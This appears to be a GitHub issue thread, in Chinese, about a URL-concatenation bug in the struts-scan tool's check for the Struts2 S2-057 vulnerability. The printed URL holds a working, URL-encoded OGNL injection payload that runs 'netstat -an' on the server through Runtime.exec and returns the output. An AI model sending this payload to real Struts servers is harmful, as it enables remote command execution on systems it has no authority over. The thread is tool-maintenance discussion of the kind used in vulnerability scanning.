### ISSUE TITLE
struts2-057 的 surl 和 rurl 拼接有点不对？

### ISSUE THREAD

**Issue by Fxyer** [Lucifer1993/struts-scan#12]
老铁，这里是不是有点问题：
struts-scan.py 的 534 和 535
surl = self.url[self.url.rfind('/')::]
rurl = self.url.replace(surl, "") + self.shell["struts2-057-1"].replace("FUZZINGCOMMAND", command) + surl
print 出来（目标是 192.168.1.1:80） ：
surl 是 /192.168.1.1:80
rurl 是 http://%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/172.16.16.13:80

**Comment by Fxyer** [comment]
又看了下，针对 057 的漏洞扫描，目标不能是 “http://192.168.1.1:80” 这种形式，必须带上具体的 url ，比如：
“http://192.168.1.1:80/index.action”
不然以  / 分割的话会割到 http 后面的 / 上去...
我自己用的时候调整了一下....

**Comment by Lucifer1993** [comment]
分割的时候写的粗糙了些，不过057肯定是有action的

**Comment by Fxyer** [comment]
嗯嗯，小问题，看老铁的项目帮了我大忙！
